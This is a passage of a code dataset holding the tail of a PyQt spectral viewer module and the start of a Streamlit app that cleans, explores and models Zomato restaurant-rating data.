icon = QIcon(pixmap)\n\n layer_item = self.get_layer_item(layer)\n\n if layer_item is not None:\n layer_item.setIcon(0, icon)\n\n @DispatchHandle.register_listener(\"on_added_model\")\n def add_model_item(self, model, layer, unique=True):\n \"\"\"\n Adds an `astropy.modeling.Model` to the loaded model tree widget.\n\n Parameters\n ----------\n \"\"\"\n if model is None:\n return\n\n if unique:\n if self.get_model_item(model) is not None:\n return\n\n name = model.name\n\n if not name:\n count = 1\n\n root = self.wgt_model_list.invisibleRootItem()\n\n for i in range(root.childCount()):\n child = root.child(i)\n\n if isinstance(model, child.data(0, Qt.UserRole).__class__):\n count += 1\n\n name = model.__class__.__name__.replace('1D', '') + str(count)\n model._name = name\n\n new_item = QTreeWidgetItem()\n new_item.setFlags(new_item.flags() | Qt.ItemIsEditable)\n\n new_item.setText(0, name)\n new_item.setData(0, Qt.UserRole, model)\n\n for i, para in enumerate(model.param_names):\n new_para_item = QTreeWidgetItem(new_item)\n new_para_item.setText(0, para)\n new_para_item.setData(0, Qt.UserRole,\n model.parameters[i])\n new_para_item.setText(1, \"{:4.4g}\".format(model.parameters[i]))\n new_para_item.setFlags(new_para_item.flags() | Qt.ItemIsEditable)\n\n self.wgt_model_list.addTopLevelItem(new_item)\n\n @DispatchHandle.register_listener(\"on_removed_model\")\n def remove_model_item(self, model=None, layer=None):\n root = self.wgt_model_list.invisibleRootItem()\n\n for i in range(root.childCount()):\n child = root.child(i)\n\n if child is None:\n continue\n\n if child.data(0, Qt.UserRole) == model:\n root.removeChild(child)\n break\n\n def update_model_item(self, model):\n if hasattr(model, '_submodels'):\n for sub_model in model._submodels:\n self.update_model_item(sub_model)\n else:\n return\n\n model_item = self.get_model_item(model)\n\n if model_item is None:\n return\n\n for i, para in enumerate(model.param_names):\n for i in range(model_item.childCount()):\n param_item = model_item.child(i)\n\n if param_item.text(0) == para:\n param_item.setText(1, \"{:4.4g}\".format(\n model.parameters[i]))\n\n def get_model_item(self, model):\n root = self.wgt_model_list.invisibleRootItem()\n\n for i in range(root.childCount()):\n child = root.child(i)\n\n if child.data(0, Qt.UserRole) == model:\n return child\n\n def _model_parameter_validation(self, item, col):\n if col == 0:\n return\n\n try:\n txt = \"{:4.4g}\".format(float(item.text(col)))\n item.setText(col, txt)\n item.setData(col, Qt.UserRole, float(item.text(col)))\n except ValueError:\n prev_val = item.data(col, Qt.UserRole)\n item.setText(col, str(prev_val))\n\n def get_model_inputs(self):\n \"\"\"\n Returns the model and current parameters displayed in the UI.\n\n Returns\n -------\n models : dict\n A dictionary with the model instance as the key and a list of\n floats as the parameters values.\n \"\"\"\n root = self.wgt_model_list.invisibleRootItem()\n models = {}\n\n for model_item in [root.child(j) for j in range(root.childCount())]:\n model = model_item.data(0, Qt.UserRole)\n args = []\n\n for i in range(model_item.childCount()):\n child_item = model_item.child(i)\n child = child_item.text(1)\n\n args.append(float(child))\n\n models[model] = args\n\n return models\n\n def clear_layer_widget(self):\n self.wgt_layer_list.clear()\n\n def clear_model_widget(self):\n self.wgt_model_list.clear()\n\n @DispatchHandle.register_listener(\"on_updated_stats\")\n def update_statistics(self, stats, layer):\n self.main_window.currentLayerLineEdit.setText(\"{}\".format(layer.name))\n\n if 'mean' in stats:\n self.main_window.meanLineEdit.setText(\"{0:4.4g}\".format(\n stats['mean'].value))\n\n self.main_window.medianLineEdit.setText(\"{0:4.4g}\".format(\n stats['median'].value))\n\n self.main_window.standardDeviationLineEdit.setText(\"{0:4.4g}\".format(\n stats['stddev'].value))\n\n self.main_window.totalLineEdit.setText(\"{0:4.4g}\".format(\n float(stats['total'].value)))\n\n self.main_window.dataPointCountLineEdit.setText(\n str(stats['npoints']))\n\n if 'eq_width' in stats:\n self.main_window.equivalentWidthLineEdit.setText(\"{0:4.4g}\".format(\n float(stats['eq_width'].value)))\n\n if 'centroid' in stats:\n self.main_window.centroidLineEdit.setText(\"{0:5.5g}\".format(\n float(stats['centroid'].value)))\n\n if 'flux' in stats:\n self.main_window.fluxLineEdit.setText(\"{0:4.4g}\".format(\n float(stats['flux'].value)))\n\n if 'avg_cont' in stats:\n self.main_window.meanContinuumLineEdit.setText(\"{0:4.4g}\".format(\n float(stats['avg_cont'].value)))\n\n\n @DispatchHandle.register_listener(\"on_added_linelist\")\n def add_linelist(self, linelist):\n\n # This is setting all markers at a fixed heigth in the\n # initial (before any zoom) data coordinates. Still TBD\n # how to do this in the generic case. Maybe derive heights\n # from curve data instead? Make the markers follow the\n # curve ups and downs?\n #\n # Ideally we would like to have the marker's X coordinate\n # pinned down to the plot surface in data value, and the Y\n # coordinate pinned down in screen value. This would make\n # the markers to stay at the same height in the window even\n # when the plot is zoomed. This kind of functionality doesn't\n # seem to be possible under pyqtgraph though. This requires\n # more investigation.\n\n plot_item = self.current_sub_window._plot_item\n\n # curve = plot_item.curves[0]\n\n data_range = plot_item.vb.viewRange()\n ymin = data_range[1][0]\n ymax = data_range[1][1]\n height = (ymax - ymin) * 0.75 + ymin\n\n # column names are defined in the YAML files.\n wave_column = linelist.columns['wavelength']\n id_column = linelist.columns['id']\n\n for i in range(len(wave_column)):\n marker = LineIDMarker(id_column[i], plot_item, orientation='vertical')\n\n marker.setPos(wave_column[i], height)\n\n plot_item.addItem(marker)\n # plot_item.addItem(marker.arrow)\n\n plot_item.update()\n\n plot_item.update()\n\n\n\n","sub_path":"specviz/ui/viewer.py","file_name":"viewer.py","file_ext":"py","file_size_in_byte":17425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"90885741","text":"import streamlit as st \r\nimport numpy as np \r\nimport pandas as pd\r\nimport seaborn as sns\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.svm import SVR\r\nfrom sklearn.tree import DecisionTreeRegressor\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nfrom sklearn.ensemble import ExtraTreesRegressor\r\nfrom sklearn.ensemble import GradientBoostingRegressor\r\nfrom xgboost import XGBRegressor\r\nimport tensorflow as tf\r\nfrom sklearn.metrics import r2_score\r\nfrom sklearn.model_selection import train_test_split\r\nimport pickle\r\n\r\nimport warnings\r\nwarnings.filterwarnings('ignore')\r\nmatplotlib.use('Agg')\r\n\r\n\r\nfrom PIL import Image\r\n\r\n#Set title\r\n\r\n# st.title('Zomato Restaurant Rating')\r\n# image = Image.open('Zomato.jpg')\r\n# st.image(image,use_column_width=True)\r\n\r\n\r\n\r\ndef main():\r\n\tactivities=['Data Preparation','Exploratory Data Analysis','Feature Engineering','Model','Predict Rating','About us']\r\n\toption=st.sidebar.selectbox('Selection option:',activities)\r\n\r\n\tif option=='Data Preparation' or option== 'Exploratory Data Analysis' or option=='Feature Engineering' or option=='Model':\r\n\r\n\t\tst.title('Zomato Restaurant Rating')\r\n\t\timage = Image.open('Zomato.jpg')\r\n\t\tst.image(image,use_column_width=True)\r\n\r\n\t\tdata=st.file_uploader(\"Upload dataset:\",type=['csv'])\r\n\r\n\t\tif data is not None:\r\n\t\t\tst.success(\"Data successfully loaded\")\r\n\t\t\tst.set_option('deprecation.showPyplotGlobalUse', False)\r\n\r\n\t#DEALING WITH THE DATA PREPARATION PART\r\n\r\n\r\n\t\tif option=='Data Preparation':\r\n\t\t\tst.subheader(\"Data Preparation\")\r\n\t\t\tst.write(\"\"\"\r\n\t\t\t\t### Showing top 50 records\r\n\t\t\t\t\"\"\") \r\n\t\t\tif data is not None:\r\n\t \r\n\t \r\n\t\t\t\tdf=pd.read_csv(data)\r\n\t\t\t\tst.dataframe(df.head(50))\r\n\r\n\t\t\t\tst.warning('Please check box in sequence for Data Preparation phase else you might get error')\r\n\r\n\t\t\t\tif st.checkbox(\"Display shape\"):\r\n\t\t\t\t\tst.write(df.shape)\r\n\t\t\t\tif st.checkbox(\"Display columns\"):\r\n\t\t\t\t\tst.write(df.columns)\r\n\r\n\t\t\t\tif st.checkbox('Display Null Values'):\r\n\t\t\t\t\tst.write(df.isnull().sum())\r\n\r\n\t\t\t\tif st.checkbox(\"Display the data types\"):\r\n\t\t\t\t\tst.write(df.dtypes)\r\n\r\n\t\t\t\tif st.checkbox(\"Count of duplicate records\"):\r\n\t\t\t\t\tst.write(df.duplicated().sum())\r\n\r\n\t\t\t\tif st.checkbox(\"Display null record for dish_liked columns\"):\r\n\t\t\t\t\tst.write(df[df['dish_liked'].isnull()].head())\r\n\r\n\t\t\t\tif st.checkbox(\"Replace null value of dish_liked column with 'not_available'\"):\r\n\t\t\t\t\tdf['dish_liked'] = df['dish_liked'].replace(np.nan, 'not_available', regex=True)\r\n\t\t\t\t\tst.write(df[df['dish_liked']=='not_available'].head())\r\n\t \r\n\t\t\t\tif st.checkbox(\"Drop url,address and phone column\"):\r\n\t\t\t\t\tdf.drop(['url','phone','address'],axis=1,inplace= True)\r\n\t\t\t\t\tst.write(df.columns)\r\n\r\n\t\t\t\tif st.checkbox(\"Check null values after correction in dish_liked column\"):\r\n\t\t\t\t\tst.write(df.isnull().sum())\r\n\t\t\t\t\tst.write(\"Null values in rate column need to be dropped and rest of columns has very few null record.Hence dropping all null values\")\r\n\r\n\t\t\t\tif st.checkbox(\"Drop null values(as null records are less now)\"):\r\n\t\t\t\t\tdf.dropna(how='any',inplace=True)\r\n\t\t\t\t\tst.write(df.isnull().sum())\r\n\r\n\t\t\t\tif st.checkbox(\"Renaming columes appropriately\"):\r\n\t\t\t\t\tdf = df.rename(columns={'approx_cost(for two people)':'cost','listed_in(type)':'type','listed_in(city)':'city'})\r\n\t\t\t\t\tst.write(df.columns)\r\n\t \r\n\t\t\t\tst.write(\"\"\"\r\n\t\t\t\t\t### Cost Column\r\n\t\t\t\t\t\"\"\")\r\n\t\t\t\tif st.checkbox(\"Display Unique values of cost\"):\r\n\t\t\t\t\tst.write(df['cost'].unique())\r\n\t\t\t\tif st.checkbox(\"Remove commas\"):\r\n\t\t\t\t\tdf['cost'] = df['cost'].apply(lambda x: x.replace(',',''))\r\n\t\t\t\t\tdf['cost'] = df['cost'].astype(float)\r\n\t\t\t\t\tst.write(df['cost'].unique())\r\n\r\n\t\t\t\tst.write(\"\"\"\r\n\t\t\t\t\t### Rate Column\r\n\t\t\t\t\t\"\"\")\r\n\t\t\t\tif st.checkbox(\"Display Unique values of rate\"):\r\n\t\t\t\t\tst.write(df['rate'].unique())\r\n\t\t\t\tif st.checkbox(\"Get rid of 'NEW' and '-' values\"):\r\n\t\t\t\t\tdf = df.loc[df.rate !='NEW']\r\n\t\t\t\t\tdf = df.loc[df.rate !='-']\r\n\t\t\t\t\tst.write(df['rate'].unique())\r\n\t\t\t\tif st.checkbox(\"Make it float value\"):\r\n\t\t\t\t\tdf['rate'] = df['rate'].apply(lambda x: x.replace('/5',''))\r\n\t\t\t\t\tdf['rate'] = df['rate'].astype(float)\r\n\t\t\t\t\tst.write(df['rate'].unique())\r\n\r\n\t\t\t\tst.write(\"\"\"\r\n\t\t\t\t\t### reviews_list Column\r\n\t\t\t\t\t\"\"\")\r\n\t\t\t\tif st.checkbox(\"Display few records of reviews_list\"):\r\n\t\t\t\t\tst.write(df['reviews_list'].head())\r\n\t\t\t\tif st.checkbox(\"Fetch rating only\"):\r\n\t\t\t\t\tdf['reviews_list'] = df['reviews_list'].apply(lambda x : x.split(',')[0])\r\n\t\t\t\t\tdf['reviews_list'] = df['reviews_list'].apply(lambda x : x.split('Rated'))\r\n\t\t\t\t\tdf['reviews_list'] = df['reviews_list'].apply(lambda x : x[-1])\r\n\t\t\t\t\tdf['reviews_list'] = df['reviews_list'].apply(lambda x : x.replace('\\'',''))\r\n\t\t\t\t\tdf['reviews_list'] = df['reviews_list'].apply(lambda x : x.strip())\r\n\t\t\t\t\tdigits_in_review= pd.DataFrame(df['reviews_list'].str.replace('.','').str.isdigit()) \r\n\t\t\t\t\tdf = df[digits_in_review['reviews_list'] == True]\r\n\t\t\t\t\tdf['reviews_list'] = df['reviews_list'].astype(float)\r\n\t\t\t\t\tst.write(df['reviews_list'].head())\r\n\r\n\t\t\t\tst.write(\"\"\"\r\n\t\t\t\t\t### Showing record after DataPreparation Stage\r\n\t\t\t\t\t\"\"\")\t\t\t\r\n\t\t\t\tif st.checkbox('Show record'):\r\n\t\t\t\t\tst.write(df.head())\r\n\r\n\t#DEALING WITH THE EDA PART\r\n\r\n\r\n\t\telif option=='Exploratory Data Analysis':\r\n\t\t\tst.subheader(\"Exploratory Data Analysis\")\r\n\t \t\r\n\t\t\tif data is not None:\r\n\t \r\n\t \r\n\t\t\t\t# Data Preparation Phase\r\n\t\t\t\tdf=pd.read_csv(data)\r\n\t\t\t\tdf['dish_liked'] = df['dish_liked'].replace(np.nan, 'not_available', regex=True)\r\n\t\t\t\tdf.drop(['url','phone','address'],axis=1,inplace= True)\r\n\t\t\t\tdf.dropna(how='any',inplace=True)\r\n\t\t\t\tdf = df.rename(columns={'approx_cost(for two people)':'cost','listed_in(type)':'type','listed_in(city)':'city'})\r\n\t\t\t\tdf['cost'] = df['cost'].apply(lambda x: x.replace(',',''))\r\n\t\t\t\tdf['cost'] = df['cost'].astype(float)\r\n\t\t\t\tdf = df.loc[df.rate !='NEW']\r\n\t\t\t\tdf = df.loc[df.rate !='-']\r\n\t\t\t\tdf['rate'] = df['rate'].apply(lambda x: x.replace('/5',''))\r\n\t\t\t\tdf['rate'] = df['rate'].astype(float)\r\n\t\t\t\tdf['reviews_list'] = df['reviews_list'].apply(lambda x : x.split(',')[0])\r\n\t\t\t\tdf['reviews_list'] = df['reviews_list'].apply(lambda x : x.split('Rated'))\r\n\t\t\t\tdf['reviews_list'] = df['reviews_list'].apply(lambda x : x[-1])\r\n\t\t\t\tdf['reviews_list'] = df['reviews_list'].apply(lambda x : x.replace('\\'',''))\r\n\t\t\t\tdf['reviews_list'] = df['reviews_list'].apply(lambda x : x.strip())\r\n\t\t\t\tdigits_in_review= pd.DataFrame(df['reviews_list'].str.replace('.','').str.isdigit()) \r\n\t\t\t\tdf = df[digits_in_review['reviews_list'] == True]\r\n\t\t\t\tdf['reviews_list'] = df['reviews_list'].astype(float)\r\n\r\n\r\n\t\t\t\tst.write(\"\"\"\r\n\t\t\t\t\t### Univariate analysis\r\n\t\t\t\t\t\"\"\")\t\r\n\t \r\n\r\n\r\n\r\n\t\t\t\tif st.checkbox('Most famous restaurants chains in Bangaluru(upto 20)'):\r\n\t\t\t\t\tfig = plt.figure(figsize=(17,10))\r\n\t\t\t\t\tchains=df['name'].value_counts()[:20]\r\n\t\t\t\t\tsns.barplot(x=chains,y=chains.index,palette='deep')\r\n\t\t\t\t\tplt.title(\"Most famous restaurants chains in Bangaluru\")\r\n\t\t\t\t\tplt.xlabel(\"Number of outlets\")\r\n\t\t\t\t\tst.pyplot(fig)\r\n\t\t\t\t\tst.write(\"Cafe Coffee Day and Onesta seems to be most famous\")\r\n\r\n\t\t\t\tif st.checkbox('Whether restaurant offer Table booking or not'):\r\n\t\t\t\t\tbook=df['book_table'].value_counts()\r\n\t\t\t\t\tfig = plt.figure(figsize= (2,2))\r\n\t\t\t\t\tbook.plot.pie(autopct=\"%.1f%%\")\r\n\t\t\t\t\t# plt.title('Table Booking')\r\n\t\t\t\t\t\r\n\t\t\t\t\tst.pyplot(fig)\r\n\t\t\t\t\tst.write(\"Most of the Restaurants do not offer table booking\")\r\n\r\n\t\t\t\tif st.checkbox('Whether Restaurants deliver online or Not'):\r\n\t\t\t\t\tonline=df['online_order'].value_counts()\r\n\t\t\t\t\tfig = plt.figure(figsize= (2,2))\r\n\t\t\t\t\tonline.plot.pie(autopct=\"%.1f%%\")\r\n\t\t\t\t\t# plt.title('Whether Restaurants deliver online or Not')\r\n\t\t\t\t\tst.pyplot(fig)\r\n\t\t\t\t\tst.write(\"Most Restaurants offer option for online order and delivery\")\r\n\r\n\t\t\t\tif st.checkbox('Rating Distribution'):\r\n\t\t\t\t\tfig = plt.figure(figsize=(9,7))\r\n\t\t\t\t\tsns.distplot(df['rate'],bins=20)\r\n\t\t\t\t\tst.pyplot(fig)\r\n\t\t\t\t\tst.write(\"Pie Chart\")\r\n\t\t\t\t\tslices=[((df['rate']>=1) & (df['rate']<2)).sum(),\r\n\t\t\t\t\t\t\t((df['rate']>=2) & (df['rate']<3)).sum(),\r\n\t\t\t\t\t\t\t((df['rate']>=3) & (df['rate']<4)).sum(),\r\n\t\t\t\t\t\t\t(df['rate']>=4).sum()\r\n\t\t\t\t\t\t\t]\r\n\t\t\t\t\tfig = plt.figure(figsize= (10,10))\r\n\t\t\t\t\tlabels=['14']\r\n\t\t\t\t\tcolors = ['#ff3333','#c2c2d6','#6699ff']\r\n\t\t\t\t\tplt.pie(slices,colors=colors, labels=labels, autopct='%1.0f%%')\r\n\r\n\t\t\t\t\tplt.title(\"Percentage of Restaurants according to their ratings\")\r\n\t\t\t\t\tst.pyplot(fig)\r\n\t\t\t\t\tst.write(\"We can infer from above that most of the ratings are within 3.5 and 4.5\")\r\n\r\n\t\t\t\tif st.checkbox('Services Types'):\r\n\t\t\t\t\tfig = plt.figure(figsize=(9,7))\r\n\r\n\t\t\t\t\tsns.countplot(df['type']).set_xticklabels(sns.countplot(df['type']).get_xticklabels(), rotation=90)\r\n\t\t\t\t\tfig = plt.gcf()\r\n\t\t\t\t\tfig.set_size_inches(12,12)\r\n\t\t\t\t\tplt.title('Type of Service')\r\n\t\t\t\t\tst.pyplot(fig)\r\n\t\t\t\t\tst.write(\"The two main service types are Delivery and Dine-out\")\r\n\r\n\t\t\t\tif st.checkbox('Distribution of Cost of Food for two People'):\r\n\t\t\t\t\tfig = plt.figure(figsize=(8,8))\r\n\t\t\t\t\tsns.distplot(df['cost'])\r\n\t\t\t\t\tst.pyplot(fig)\r\n\t\t\t\t\tst.write(\"Box Plot\")\r\n\t\t\t\t\tfig = plt.figure(figsize= (10,10))\r\n\t\t\t\t\tsns.boxplot(data =df['cost'],y = df['cost'])\r\n\t\t\t\t\tst.pyplot(fig)\r\n\t\t\t\t\tst.write(\"The median of cost seems to be around 800-900\")\r\n\r\n\t\t\t\tif st.checkbox(\"Most Liked Dishes\"):\r\n\t\t\t\t\timport re\r\n\r\n\t\t\t\t\tdf.index=range(df.shape[0])\r\n\t\t\t\t\tlikes=[]\r\n\t\t\t\t\tfor i in range(df.shape[0]):\r\n\t\t\t\t\t\tarray_split=re.split(',',df['dish_liked'][i])\r\n\t\t\t\t\t\tfor item in array_split:\r\n\t\t\t\t\t\t\tlikes.append(item)\r\n\r\n\t\t\t\t\tfig = plt.figure(figsize=(17,10))\r\n\t\t\t\t\tfavourite_food = pd.Series(likes).value_counts()\r\n\t\t\t\t\tfood=favourite_food[1:21]\r\n\t\t\t\t\tsns.barplot(x=food,y=food.index,palette='deep')\r\n\t\t\t\t\tplt.title(\"Most liked dish\")\r\n\t\t\t\t\tplt.xlabel(\"Count\")\r\n\t\t\t\t\tst.pyplot(fig)\r\n\t\t\t\t\tst.write(\"The 5 most liked dishes are Pasta,Pizza,Cocktails,Burgers,and Mocktails\")\r\n\r\n\t\t\t\tif st.checkbox('Restaurant types'):\r\n\t\t\t\t\tfig = plt.figure(figsize=(17,10))\r\n\t\t\t\t\trest=df['rest_type'].value_counts()[:20]\r\n\t\t\t\t\tsns.barplot(rest,rest.index)\r\n\t\t\t\t\tplt.title(\"Restaurant types\")\r\n\t\t\t\t\tplt.xlabel(\"count\")\r\n\t\t\t\t\tst.pyplot(fig)\r\n\t\t\t\t\tst.write(\"Casual Dining and Quick Bites are the 2 most common types of Restaurants\")\r\n\r\n\r\n\r\n\r\n\t\t\t\tst.write(\"\"\"\r\n\t\t\t\t\t### Multivariate analysis\r\n\t\t\t\t\t\"\"\")\t\r\n\t \r\n\r\n\t\t\t\tif st.checkbox(\"Display Correlation\"):\r\n\t\t\t\t\tfig=plt.figure(figsize=(23,12))\r\n\t\t\t\t\tsns.heatmap(df.corr(),annot=True)\r\n\t\t\t\t\tst.pyplot(fig)\r\n\t\t\t\t\tst.write(\"The features are less correlated which is a good thing for us to avoid Multicollinearity\")\r\n\r\n\t\t\t\t\r\n\r\n\r\n\t\t\t\tif st.checkbox(\"Pairplot\"):\r\n\t\t\t\t\t# fig, ax = plt.subplots()\r\n\t\t\t\t\t\r\n\t\t\t\t\tsns.pairplot(df,kind='scatter')\r\n\t\t\t\t\tst.pyplot()\r\n\t \r\n\t\t\t\tif st.checkbox(\"Display summary\"):\r\n\t\t\t\t\tst.write(df.describe().T)\r\n\r\n\r\n\t\t\t\t\r\n\t\t\t\r\n\t#DEALING WITH THE Feature Engineering PART\r\n\r\n\r\n\t\telif option=='Feature Engineering':\r\n\t\t\tst.subheader(\"Feature Engineering\")\r\n\t \t\r\n\t\t\tif data is not None:\r\n\t \r\n\t \r\n\t\t\t\t# Data Preparation Phase\r\n\t\t\t\tdf=pd.read_csv(data)\r\n\t\t\t\tdf['dish_liked'] = df['dish_liked'].replace(np.nan, 'not_available', regex=True)\r\n\t\t\t\tdf.drop(['url','phone','address'],axis=1,inplace= True)\r\n\t\t\t\tdf.dropna(how='any',inplace=True)\r\n\t\t\t\tdf = df.rename(columns={'approx_cost(for two people)':'cost','listed_in(type)':'type','listed_in(city)':'city'})\r\n\t\t\t\tdf['cost'] = df['cost'].apply(lambda x: x.replace(',',''))\r\n\t\t\t\tdf['cost'] = df['cost'].astype(float)\r\n\t\t\t\tdf = df.loc[df.rate !='NEW']\r\n\t\t\t\tdf = df.loc[df.rate !='-']\r\n\t\t\t\tdf['rate'] = df['rate'].apply(lambda x: x.replace('/5',''))\r\n\t\t\t\tdf['rate'] = df['rate'].astype(float)\r\n\t\t\t\tdf['reviews_list'] = df['reviews_list'].apply(lambda x : x.split(',')[0])\r\n\t\t\t\tdf['reviews_list'] = df['reviews_list'].apply(lambda x : x.split('Rated'))\r\n\t\t\t\tdf['reviews_list'] = df['reviews_list'].apply(lambda x : x[-1])\r\n\t\t\t\tdf['reviews_list'] = df['reviews_list'].apply(lambda x : x.replace('\\'',''))\r\n\t\t\t\tdf['reviews_list'] = df['reviews_list'].apply(lambda x : x.strip())\r\n\t\t\t\tdigits_in_review= pd.DataFrame(df['reviews_list'].str.replace('.','').str.isdigit()) \r\n\t\t\t\tdf = df[digits_in_review['reviews_list'] == True]\r\n\t\t\t\tdf['reviews_list'] = df['reviews_list'].astype(float)\r\n\r\n\r\n\t\t\t\tst.write(\"Showing top 10 records\")\r\n\t\t\t\tst.write(df.head(10))\r\n\r\n\t\t\t\tif st.checkbox('Convert the online_order categorical variables into a numeric format'):\r\n\r\n\t\t\t\t\tdf.online_order[df.online_order == 'Yes'] = 1 \r\n\t\t\t\t\tdf.online_order[df.online_order == 'No'] = 0\r\n\t\t\t\t\tdf.online_order = pd.to_numeric(df.online_order)\r\n\t\t\t\t\tst.write(df.head(10))\r\n\r\n\t\t\t\tif st.checkbox('Convert the book_table categorical variables into a numeric format'):\r\n\r\n\t\t\t\t\tdf.book_table[df.book_table == 'Yes'] = 1 \r\n\t\t\t\t\tdf.book_table[df.book_table == 'No'] = 0\r\n\t\t\t\t\tdf.book_table = pd.to_numeric(df.book_table)\r\n\t\t\t\t\tst.write(df.head(10))\r\n\r\n\t\t\t\tst.write(\"Location\")\r\n\r\n\t\t\t\tif st.checkbox(\"Display unique location\"):\r\n\t\t\t\t\tst.write(df['location'].unique())\r\n\r\n\t\t\t\tif st.checkbox(\"Display top 20 location\"):\r\n\t\t\t\t\ttop_20_location = df['location'].value_counts()[:20]\r\n\t\t\t\t\tst.write(top_20_location.index)\r\n\r\n\t\t\t\tif st.checkbox(\"Convert the location other than top 20 into 'other_location'\"):\r\n\t\t\t\t\tdf['location'] = df['location'].apply(lambda x: x if x in top_20_location.index else 'other_location')\r\n\t\t\t\t\tst.write(df['location'].unique())\r\n\r\n\r\n\t\t\t\tst.write(\"rest_type\")\r\n\r\n\t\t\t\tif st.checkbox(\"Display unique rest_type\"):\r\n\t\t\t\t\tst.write(df['rest_type'].unique())\r\n\r\n\t\t\t\tif st.checkbox(\"Display top 10 rest_type\"):\r\n\t\t\t\t\ttop_10_rest_type = df['rest_type'].value_counts()[:10]\r\n\t\t\t\t\tst.write(top_10_rest_type.index)\r\n\r\n\t\t\t\tif st.checkbox(\"Convert the rest_type other than top 10 into 'other_rest_type'\"):\r\n\t\t\t\t\tdf['rest_type'] = df['rest_type'].apply(lambda x: x if x in top_10_rest_type.index else 'other_rest_type')\r\n\t\t\t\t\tst.write(df['rest_type'].unique())\r\n\r\n\r\n\r\n\t\t\t\tst.write(\"cuisines\")\r\n\r\n\t\t\t\tif st.checkbox(\"Display unique cuisines\"):\r\n\t\t\t\t\tst.write(df['cuisines'].unique())\r\n\r\n\t\t\t\tif st.checkbox(\"Display top 15 cuisines\"):\r\n\t\t\t\t\ttop_15_cuisines= df['cuisines'].value_counts()[:15]\r\n\t\t\t\t\tst.write(top_15_cuisines.index)\r\n\r\n\t\t\t\tif st.checkbox(\"Convert the cuisines other than top 15 into 'other_cuisines'\"):\r\n\t\t\t\t\tdf['cuisines'] = df['cuisines'].apply(lambda x: x if x in top_15_cuisines.index else 'other_cuisines')\r\n\t\t\t\t\tst.write(df['cuisines'].unique())\r\n\r\n\t\t\t\tst.text(\"---\"*100)\r\n\r\n\t\t\t\tif st.checkbox(\"Drop name,city,dish_liked and menu_item columns\"):\r\n\t\t\t\t\t# df.drop(['menu_item','dish_liked'],axis = 1 , inplace = True)\r\n\t\t\t\t\tdf.drop(['name','menu_item','dish_liked','city'],axis=1,inplace = True)\r\n\t\t\t\t\tst.write(df.head(10))\r\n\r\n\t\t\t\tif st.checkbox('Apply Onehot Encoding on the categorical variables'):\r\n\t\t\t\t\tsource_dummy=pd.get_dummies(df[['location','rest_type','cuisines','type']],drop_first=True)\r\n\t\t\t\t\tdf=pd.concat([source_dummy,df],axis=1)\r\n\t\t\t\t\tdf.drop(['location','rest_type','cuisines','type'],inplace=True,axis=1)\r\n\t\t\t\t\tst.write(df.head(10))\r\n\r\n\t\t\t\tif st.checkbox(\"Apply log transfrom on cost and votes columns\"):\r\n\t\t\t\t\tdf['votes'] = df['votes'].replace(0, 1)\r\n\t\t\t\t\tdf['cost'] = np.log(df['cost'])\r\n\t\t\t\t\tdf['votes'] = np.log(df['votes'])\r\n\t\t\t\t\tst.write(df.head(10))\r\n\r\n\t\t\t\tif st.checkbox(\"Display shape\"):\r\n\t\t\t\t\tst.write(df.shape)\r\n\r\n\r\n\r\n\r\n\t\t# DEALING WITH THE MODEL BUILDING PART\r\n\r\n\t\telif option=='Model':\r\n\t\t\tst.subheader(\"Model Building\")\r\n\t\t\t# dumm=0\r\n\t\t\t\t\t\t\r\n\r\n\t\t\t\r\n\t\t\tif data is not None:\r\n\t\t\t\t# Data Preparation Phase\r\n\t\t\t\tdf=pd.read_csv(data)\r\n\t\t\t\tdf['dish_liked'] = df['dish_liked'].replace(np.nan, 'not_available', regex=True)\r\n\t\t\t\tdf.drop(['url','phone','address'],axis=1,inplace= True)\r\n\t\t\t\tdf.dropna(how='any',inplace=True)\r\n\t\t\t\tdf = df.rename(columns={'approx_cost(for two people)':'cost','listed_in(type)':'type','listed_in(city)':'city'})\r\n\t\t\t\tdf['cost'] = df['cost'].apply(lambda x: x.replace(',',''))\r\n\t\t\t\tdf['cost'] = df['cost'].astype(float)\r\n\t\t\t\tdf = df.loc[df.rate !='NEW']\r\n\t\t\t\tdf = df.loc[df.rate !='-']\r\n\t\t\t\tdf['rate'] = df['rate'].apply(lambda x: x.replace('/5',''))\r\n\t\t\t\tdf['rate'] = df['rate'].astype(float)\r\n\t\t\t\tdf['reviews_list'] = df['reviews_list'].apply(lambda x : x.split(',')[0])\r\n\t\t\t\tdf['reviews_list'] = df['reviews_list'].apply(lambda x : x.split('Rated'))\r\n\t\t\t\tdf['reviews_list'] = df['reviews_list'].apply(lambda x : x[-1])\r\n\t\t\t\tdf['reviews_list'] = df['reviews_list'].apply(lambda x : x.replace('\\'',''))\r\n\t\t\t\tdf['reviews_list'] = df['reviews_list'].apply(lambda x : x.strip())\r\n\t\t\t\tdigits_in_review= pd.DataFrame(df['reviews_list'].str.replace('.','').str.isdigit()) \r\n\t\t\t\tdf = df[digits_in_review['reviews_list'] == True]\r\n\t\t\t\tdf['reviews_list'] = df['reviews_list'].astype(float)\r\n\t\t\t\t# Feature Scaling\r\n\t\t\t\tdf.online_order[df.online_order == 'Yes'] = 1\r\n\t\t\t\tdf.online_order[df.online_order == 'No'] = 0\r\n\t\t\t\tdf.online_order = pd.to_numeric(df.online_order)\r\n\t\t\t\tdf.book_table[df.book_table == 'Yes'] = 1 \r\n\t\t\t\tdf.book_table[df.book_table == 'No'] = 0\r\n\t\t\t\tdf.book_table = pd.to_numeric(df.book_table)\r\n\t\t\t\ttop_20_location = df['location'].value_counts()[:20]\r\n\t\t\t\tdf['location'] = df['location'].apply(lambda x: x if x in top_20_location.index else 'other_location')\r\n\t\t\t\ttop_10_rest_type = df['rest_type'].value_counts()[:10]\r\n\t\t\t\tdf['rest_type'] = df['rest_type'].apply(lambda x: x if x in top_10_rest_type.index else 'other_rest_type')\r\n\t\t\t\ttop_15_cuisines= df['cuisines'].value_counts()[:15]\r\n\t\t\t\tdf['cuisines'] = df['cuisines'].apply(lambda x: x if x in top_15_cuisines.index else 'other_cuisines')\r\n\t\t\t\tdf.drop(['name','menu_item','dish_liked','city'],axis=1,inplace = True)\r\n\t\t\t\tsource_dummy=pd.get_dummies(df[['location','rest_type','cuisines','type']],drop_first=True)\r\n\t\t\t\tdf=pd.concat([source_dummy,df],axis=1)\r\n\t\t\t\tdf.drop(['location','rest_type','cuisines','type'],inplace=True,axis=1)\r\n\t\t\t\tdf['votes'] 